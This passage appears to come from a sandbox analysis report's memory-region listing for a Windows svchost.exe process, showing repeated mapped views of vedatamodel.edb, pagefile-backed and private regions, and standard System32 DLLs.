"c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5665 start_va = 0xf3baef0000 end_va = 0xf3baefffff entry_point = 0xf3baef0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5666 start_va = 0xf3baf00000 end_va = 0xf3baf0ffff entry_point = 0xf3baf00000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5667 start_va = 0xf3baf10000 end_va = 0xf3baf1ffff entry_point = 0xf3baf10000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5668 start_va = 0xf3baf20000 end_va = 0xf3baf2ffff entry_point = 0xf3baf20000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5669 start_va = 0xf3baf30000 end_va = 0xf3baf3ffff entry_point = 0xf3baf30000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5670 start_va = 0xf3baf40000 end_va = 0xf3baf4ffff entry_point = 0xf3baf40000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5671 start_va = 0xf3baf50000 end_va = 0xf3baf5ffff entry_point = 0xf3baf50000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5672 start_va = 0xf3baf60000 end_va = 0xf3baf6ffff entry_point = 0xf3baf60000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5673 start_va = 0xf3baf70000 end_va = 0xf3baf7ffff entry_point = 0xf3baf70000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5674 start_va = 0xf3baf80000 end_va = 0xf3baf8ffff entry_point = 0xf3baf80000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5675 start_va = 0xf3baf90000 end_va = 0xf3bafb9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f3baf90000" filename = "" Region: id = 5676 start_va = 0xf3bafc0000 end_va = 0xf3bafcffff entry_point = 0xf3bafc0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5677 start_va = 0xf3bafd0000 end_va = 0xf3bafdffff entry_point = 0xf3bafd0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5678 start_va = 0xf3bafe0000 end_va = 0xf3bafeffff entry_point = 0xf3bafe0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5679 start_va = 0xf3baff0000 end_va = 0xf3baffffff entry_point = 0xf3baff0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5680 start_va = 0xf3bb300000 end_va = 0xf3bb3fffff entry_point = 0x0 region_type = private name = "private_0x000000f3bb300000" filename = "" Region: id = 5681 start_va = 0xf3bb400000 end_va = 0xf3bb40ffff entry_point = 0xf3bb400000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5682 start_va = 0xf3bb410000 end_va = 0xf3bb41ffff entry_point = 0xf3bb410000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5683 start_va = 0xf3bb420000 end_va = 0xf3bb42ffff entry_point = 0xf3bb420000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5684 start_va = 0xf3bb430000 end_va = 0xf3bb43ffff entry_point = 0xf3bb430000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5685 start_va = 0xf3bb440000 end_va = 0xf3bb44ffff entry_point = 0xf3bb440000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5686 start_va = 0xf3bb450000 end_va = 0xf3bb45ffff entry_point = 0xf3bb450000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5687 start_va = 0xf3bb460000 end_va = 0xf3bb46ffff entry_point = 0xf3bb460000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5688 start_va = 0xf3bb470000 end_va = 0xf3bb47ffff entry_point = 0xf3bb470000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5689 start_va = 0xf3bb480000 end_va = 0xf3bb48ffff entry_point = 0xf3bb480000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5690 start_va = 0xf3bb490000 end_va = 0xf3bb49ffff entry_point = 0xf3bb490000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5691 start_va = 0xf3bb4a0000 end_va = 0xf3bb4affff entry_point = 0xf3bb4a0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5692 start_va = 0xf3bb4b0000 end_va = 0xf3bb4bffff entry_point = 0xf3bb4b0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5693 start_va = 0xf3bb4c0000 end_va = 0xf3bb4cffff entry_point = 0xf3bb4c0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5694 start_va = 0xf3bb4d0000 end_va = 0xf3bb4dffff entry_point = 0xf3bb4d0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5695 start_va = 0xf3bb4e0000 end_va = 0xf3bb4effff entry_point = 0xf3bb4e0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5696 start_va = 0xf3bb4f0000 end_va = 0xf3bb4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000f3bb4f0000" filename = "" Region: id = 5697 start_va = 0xf3bb500000 end_va = 0xf3bb5fffff entry_point = 0x0 region_type = private name = "private_0x000000f3bb500000" filename = "" Region: id = 5698 start_va = 0xf3bb600000 end_va = 0xf3bb60ffff entry_point = 0xf3bb600000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5699 start_va = 0xf3bb610000 end_va = 0xf3bb61ffff entry_point = 0xf3bb610000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5700 start_va = 0xf3bb620000 end_va = 0xf3bb62ffff entry_point = 0xf3bb620000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5701 start_va = 0xf3bb630000 end_va = 0xf3bb63ffff entry_point = 0xf3bb630000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5702 start_va = 0xf3bb640000 end_va = 0xf3bb64ffff entry_point = 0xf3bb640000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5703 start_va = 0xf3bb650000 end_va = 0xf3bb65ffff entry_point = 0xf3bb650000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5704 start_va = 0xf3bb660000 end_va = 0xf3bb66ffff entry_point = 0xf3bb660000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5705 start_va = 0xf3bb670000 end_va = 0xf3bb67ffff entry_point = 0xf3bb670000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5706 start_va = 0xf3bb680000 end_va = 0xf3bb68ffff entry_point = 0xf3bb680000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5707 start_va = 0xf3bb690000 end_va = 0xf3bb69ffff entry_point = 0xf3bb690000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5708 start_va = 0xf3bb6a0000 end_va = 0xf3bb6affff entry_point = 0xf3bb6a0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5709 start_va = 0xf3bb6b0000 end_va = 0xf3bb6bffff entry_point = 0xf3bb6b0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5710 start_va = 0xf3bb6c0000 end_va = 0xf3bb6cffff entry_point = 0xf3bb6c0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5711 start_va = 0xf3bb6d0000 end_va = 0xf3bb6dffff entry_point = 0xf3bb6d0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5712 start_va = 0xf3bb6e0000 end_va = 0xf3bb6effff entry_point = 0xf3bb6e0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5713 start_va = 0xf3bb6f0000 end_va = 0xf3bb6fffff entry_point = 0xf3bb6f0000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5714 start_va = 0xf3bb700000 end_va = 0xf3bb70ffff entry_point = 0xf3bb700000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5715 start_va = 0xf3bb710000 end_va = 0xf3bb71ffff entry_point = 0xf3bb710000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5716 start_va = 0xf3bb720000 end_va = 0xf3bb72ffff entry_point = 0xf3bb720000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5717 start_va = 0xf3bb730000 end_va = 0xf3bb73ffff entry_point = 0xf3bb730000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5718 start_va = 0xf3bb740000 end_va = 0xf3bb74ffff entry_point = 0xf3bb740000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5719 start_va = 0xf3bb750000 end_va = 0xf3bb75ffff entry_point = 0xf3bb750000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5720 start_va = 0xf3bb760000 end_va = 0xf3bb76ffff entry_point = 0xf3bb760000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5721 start_va = 0xf3bb770000 end_va = 0xf3bb770fff entry_point = 0x0 region_type = private name = "private_0x000000f3bb770000" filename = "" Region: id = 5722 start_va = 0xf3bb780000 end_va = 0xf3bb78ffff entry_point = 0xf3bb780000 region_type = mapped_file name = "vedatamodel.edb" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\TileDataLayer\\Database\\vedatamodel.edb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\tiledatalayer\\database\\vedatamodel.edb") Region: id = 5723 start_va = 0x7df5ff2e0000 end_va = 0x7ff5ff2dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff2e0000" filename = "" Region: id = 5724 start_va = 0x7ff7874b2000 end_va = 0x7ff7874b3fff entry_point = 0x0 region_type = private name = "private_0x00007ff7874b2000" filename = "" Region: id = 5725 start_va = 0x7ff7874ba000 end_va = 0x7ff7874bbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7874ba000" filename = "" Region: id = 5726 start_va = 0x7ff7874be000 end_va = 0x7ff7874bffff entry_point = 0x0 region_type = private name = "private_0x00007ff7874be000" filename = "" Region: id = 5727 start_va = 0x7ff7874c0000 end_va = 0x7ff7875bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7874c0000" filename = "" Region: id = 5728 start_va = 0x7ff7875c0000 end_va = 0x7ff7875e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7875c0000" filename = "" Region: id = 5729 start_va = 0x7ff7875ec000 end_va = 0x7ff7875edfff entry_point = 0x0 region_type = private name = "private_0x00007ff7875ec000" filename = "" Region: id = 5730 start_va = 0x7ff7875ee000 end_va = 0x7ff7875eefff entry_point = 0x0 region_type = private name = "private_0x00007ff7875ee000" filename = "" Region: id = 5731 start_va = 0x7ff787ec0000 end_va = 0x7ff787eccfff entry_point = 0x7ff787ec0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 5732 start_va = 0x7ffae5d00000 end_va = 0x7ffae5d98fff entry_point = 0x7ffae5d00000 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 5733 start_va = 0x7ffae5da0000 end_va = 0x7ffae6031fff entry_point = 0x7ffae5da0000 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 5734 start_va = 0x7ffae8b60000 end_va = 0x7ffae8fc9fff entry_point = 0x7ffae8b60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 5735 start_va = 0x7ffaeb000000 end_va = 0x7ffaeb080fff entry_point = 0x7ffaeb000000 region_type = mapped_file name = "tileobjserver.dll" filename = "\\Windows\\System32\\tileobjserver.dll" (normalized: "c:\\windows\\system32\\tileobjserver.dll") Region: id = 5736 start_va = 0x7ffaeb090000 end_va = 0x7ffaeb371fff entry_point = 0x7ffaeb090000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 5737 start_va = 0x7ffaeb9b0000 end_va = 0x7ffaebb46fff entry_point = 0x7ffaeb9b0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 5738 start_va = 0x7ffaedb10000 end_va = 0x7ffaede85fff entry_point = 0x7ffaedb10000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 5739 start_va = 0x7ffaeef30000 end_va = 0x7ffaef03efff entry_point = 0x7ffaeef30000 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 5740 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 5741 start_va = 0x7ffaf2a20000 end_va = 0x7ffaf2a85fff entry_point = 0x7ffaf2a20000 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 5742 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 5743 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5744 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 5745 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5746 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5747 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5748 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5749 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5750 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5751 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5752 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5753 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 5754 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5755 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5756 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5757 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5758 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5759 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5760 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 